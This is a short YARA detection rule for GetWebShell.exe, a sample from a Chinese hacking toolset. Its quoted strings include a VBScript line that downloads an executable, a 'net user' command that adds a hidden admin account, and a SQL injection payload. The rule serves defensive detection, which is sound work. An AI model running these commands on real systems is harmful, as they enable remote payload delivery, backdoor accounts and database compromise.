CN_Honker_GetWebShell
Description
Sample from CN Honker Pentest Toolset - file GetWebShell.exe
Query · yara
strings: $s0 = "echo P.Open \"GET\",\"http://www.baidu.com/ma.exe\",0 >>run.vbs" fullword ascii /* PEStudio Blacklist: strings */ $s5 = "http://127.0.0.1/sql.asp?id=1" fullword wide /* PEStudio Blacklist: strings */ $s14 = "net user admin$ hack /add" fullword wide /* PEStudio Blacklist: strings */ $s15 = ";Drop table [hack];create table [dbo].[hack] ([cmd] [image])--" fullword wide /* PEStudio Blacklist: strings */ condition: uint16(0) == 0x5a4d and filesize < 70KB and 1 of them